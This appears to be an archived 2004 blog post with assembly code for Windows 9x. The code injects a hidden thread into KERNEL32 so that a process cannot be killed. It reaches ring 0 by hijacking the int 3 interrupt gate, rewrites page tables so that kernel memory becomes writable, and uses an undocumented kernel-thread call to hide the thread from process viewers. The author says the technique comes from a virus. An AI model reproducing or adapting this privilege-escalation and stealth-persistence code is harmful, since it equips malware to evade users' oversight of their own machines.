WIN9X Kernel Thread Injection and the Immortal Process Technique :: 凌辰三点

Source: BlogBus. Original link: http://www.blogbus.com:80/blogbus/blog/diary.php?diaryid=65728 Archived link: https://web.archive.org/web/20041201100436id_/http://www.blogbus.com:80/blogbus/blog/diary.php?diaryid=65728


WIN9X Kernel Thread Injection and the Immortal Process Technique
Date: 2004-01-03

We know that under the NT kernel a thread can be inserted into another process's address space with CreateRemoteThread, which lets our thread exist independently of its own process, but this does not work under Win9x. WHG's "China Hacker" (中国黑客) virus, however, added a Win9x kernel thread injection technique that injects its own thread into KERNEL32.DLL. In his code the virus process is restarted through WinExec, whereas under Win32 it is better done with CreateProcessA. That function has to write the StartInfo, ProcessInfo and similar structures into memory when it runs, and KERNEL32 is read-only from ring 3, so I improved it by making the page read/write; once that is done a ring-3 process can modify the APIs at will, and hooking becomes very simple too. The injection uses the undocumented API CreateKernelThread; MSDN says nothing about it, so I could only guess at it. Here I inject my thread at the KERNEL32 address BFF70600h (this region is empty; its code starts at BFF71000h). While debugging I found that after this API is called, the system transfers to my injected kernel thread and executes it up to WaitForSingleObject, returns to the original process and runs it to completion, and then resumes the injected kernel thread after WaitForSingleObject. In this way our thread can leave its process and run inside the KERNEL32 space, and the inserted thread cannot be found in the system's process viewer either. Using the method above I moved my earlier Win9x process-monitoring code into the kernel, but I found the system became very slow, unlike before when it ran in the process's own space. Very strange. Could some expert help take a look??

    .386p
    .model flat,stdcall
    option casemap:none

    include \masm32\include\windows.inc
    include \masm32\include\kernel32.inc
    include \masm32\include\user32.inc
    includelib \masm32\lib\kernel32.lib
    includelib \masm32\lib\user32.lib

    MoveDataToKnl PROTO :dword,:dword,:dword

    .data
    User                     db 'User32.dll',0
    KnlOpenProcessStr        db 'OpenProcess',0
    KnlWaitForObjectStr      db 'WaitForSingleObject',0
    KnlSleepStr              db 'Sleep',0
    KnlCreateKnlThreadStr    db 'CreateKernelThread',0
    KnlGetStartupInfoStr     db 'GetStartupInfoA',0
    KnlCreateProcessStr      db 'CreateProcessA',0
    KnlGetExitCodeProcessStr db 'GetExitCodeProcess',0
    UserMessageBoxStr        db 'MessageBoxA',0

    .code
    ; Problem: Sleep() has to be called here so that Kernel32 gets a chance to update its data.
    ; Every API address is stored inline (dd) right after a call, so the code stays
    ; position-independent once it has been copied into KERNEL32.
    KnlThread proc ProcID:dword
        call GetKnlSleep
    KnlSleep dd ?
    GetKnlSleep:
        pop eax                     ; eax -> KnlSleep
        push 0h
        call dword ptr [eax]        ; Sleep(0)

        call GetKnlOpenProcess
    KnlOpenProcess dd ?
    GetKnlOpenProcess:
        pop eax
        push ProcID
        push FALSE
        push PROCESS_ALL_ACCESS
        call dword ptr [eax]        ; OpenProcess(PROCESS_ALL_ACCESS, FALSE, ProcID)
        or eax,eax
        jz ExitProtectProc
        mov ebx,eax                 ; ebx = handle of the process that injected us

        call GetKnlWaitForSingleObject
    KnlWaitForSingleObject dd ?
    GetKnlWaitForSingleObject:
        pop eax
        push -1h
        push ebx
        call dword ptr [eax]        ; WaitForSingleObject(hProcess, INFINITE)

    Run:
        call Next
    Next:
        pop esi
        sub esi,offset Next         ; esi = delta between link-time and run-time addresses
        lea ebx,StartInfo[esi]
        call GetStartupIn
    KnlGetStartupInfo dd ?
    GetStartupIn:
        pop eax
        push ebx
        call dword ptr [eax]        ; GetStartupInfoA(&StartInfo)

        call GetCreateProcess
    KnlCreateProcess dd ?
    GetCreateProcess:
        pop eax
        lea ebx,ProcessInfo[esi]
        push ebx                    ; lpProcessInformation
        lea ebx,StartInfo[esi]
        push ebx                    ; lpStartupInfo
        push 0                      ; lpCurrentDirectory
        push 0                      ; lpEnvironment
        push NORMAL_PRIORITY_CLASS  ; dwCreationFlags
        push 0                      ; bInheritHandles
        push 0                      ; lpThreadAttributes
        push 0                      ; lpProcessAttributes
        push 0                      ; lpCommandLine
        call GetFileNameAddress     ; pushes the address of FileName as lpApplicationName
    FileName db 'c:\windows\notepad.exe',0
    GetFileNameAddress:
        call dword ptr [eax]        ; CreateProcessA(...)
        or eax,eax
        jz ExitProtectProc
        mov ebx,eax

    @@CheckStatus:
        call GetGetExitCodeProcess
    KnlGetExitCodeProcess dd ?
    GetGetExitCodeProcess:
        pop eax
        push ebx                    ; scratch slot that receives the exit code
        push esp                    ; lpExitCode -> that slot
        push ProcessInfo.hProcess[esi]
        call dword ptr [eax]        ; GetExitCodeProcess(hProcess, lpExitCode)
        or eax,eax
        jz ExitProtectProc
        pop eax                     ; eax = exit code
        cmp eax,STILL_ACTIVE
        jz @@CheckStatus            ; poll until the child has exited

        call GetMessageBox
    UserMessageBox dd ?
    GetMessageBox:
        pop eax
        call MsgOK
        db 'NotePad Exit ??',0
    MsgOK:
        pop ebx                     ; ebx -> message text
        push MB_YESNO
        push ebx
        push ebx
        push 0
        call dword ptr [eax]        ; MessageBoxA(0, text, text, MB_YESNO)
        cmp eax,IDNO
        jz Run                      ; "No": start the process again
    ExitProtectProc:
        ret
    KnlThread endp

    ; These live inside the copied region, so they are addressed through esi as well.
    StartInfo   STARTUPINFO <>
    ProcessInfo PROCESS_INFORMATION <>
    KnlThreadLength = $-KnlThread

    Start:
        ; 0bff70000h is the KERNEL32 base under Win9x; resolve the APIs the kernel thread needs
        invoke GetProcAddress,0bff70000h,offset KnlOpenProcessStr
        mov KnlOpenProcess,eax
        invoke GetProcAddress,0bff70000h,offset KnlWaitForObjectStr
        mov KnlWaitForSingleObject,eax
        invoke GetProcAddress,0bff70000h,offset KnlGetStartupInfoStr
        mov KnlGetStartupInfo,eax
        invoke GetProcAddress,0bff70000h,offset KnlCreateProcessStr
        mov KnlCreateProcess,eax
        invoke GetProcAddress,0bff70000h,offset KnlGetExitCodeProcessStr
        mov KnlGetExitCodeProcess,eax
        invoke GetProcAddress,0bff70000h,offset KnlSleepStr
        mov KnlSleep,eax

        invoke GetModuleHandle,offset User
        or eax,eax
        jnz OK
        invoke LoadLibraryA,offset User
    OK:
        invoke GetProcAddress,eax,offset UserMessageBoxStr
        mov UserMessageBox,eax

        ; copy the thread body (and its data) to the empty area at KERNEL32+600h
        invoke MoveDataToKnl,offset KnlThread,0bff70600h,KnlThreadLength
        ;ret
        ;int 3

        ; CreateKernelThread is undocumented; the argument layout below is the author's guess
        invoke GetProcAddress,0bff70000h,offset KnlCreateKnlThreadStr
        mov ebx,eax
        call GetCurrentProcessId
        push eax                    ; slot that receives the thread id
        push esp
        push 0
        push eax                    ; our process id, passed as ProcID
        push 0bff70000h+600h        ; start address of the injected thread
        push 0
        push 0
        call ebx
        pop eax
        invoke MessageBoxA,0,offset FileName,offset FileName,0
    Exit:
        invoke ExitProcess,0
        ;ret

    MoveDataToKnl proc Src:dword,Des:dword,nCx:dword
        push ebx
        push esi
        push edi
        push eax                    ; reserve a slot for sidt
        sidt [esp-2]                ; limit lands at [esp-2], IDT base at [esp]
        pop eax                     ; eax = IDT base
        add eax,3*8                 ; eax -> gate descriptor for int 3
        mov ebx,[eax]
        mov edx,[eax+4]             ; save the original int 3 gate
        call SetIdt03
        ; ---- ring 0 from here on ----
        pushad
        mov eax,cr3                 ; make the KERNEL32 page read/write
        and eax,0fffff000h
        push eax
        call P2L                    ; linear address of the page directory
        mov edx,0bff70000h
        shr edx,22
        shl edx,2
        mov eax,[eax+edx]           ; page-directory entry
        cmp eax,1
        jz GExit
        and eax,0fffff000h
        push eax
        call P2L                    ; linear address of the page table
        push eax
        mov edx,0bff70000h
        shl edx,10
        shr edx,22
        shl edx,2
        mov eax,[eax+edx]           ; page-table entry
        cmp eax,1
        jz GExit
        pop ecx
        or eax,7h                   ; present | read/write | user
        mov [ecx+edx],eax
    GExit:
        popad
        cli
        pushad
        mov [eax],ebx
        mov [eax+4],edx             ; restore the original int 3 gate
        cld
        rep movsb                   ; copy code/data to the chosen location in the kernel
        popad
        sti
        push ebp
        mov ebp,esp                 ; offsets the LEAVE the assembler generates before iretd
        iretd
    SetIdt03:
        pop word ptr [eax]          ; return address becomes the gate's offset (low word)
        pop word ptr [eax+6]        ; and high word
        mov esi,Src
        mov edi,Des
        mov ecx,nCx
        int 3                       ; enter the system kernel through the Win9x IDT hole
        pop edi
        pop esi
        pop ebx
        ret
    MoveDataToKnl endp

    P2L proc P2LAddress:DWORD       ; physical address -> linear address
        push P2LAddress
        int 20h
        dd 0001006ch                ; VMMCall _MapPhysToLinear
        add esp,4
        ret
    P2L endp

    end Start

Posted by seath on 2004-01-03 03:30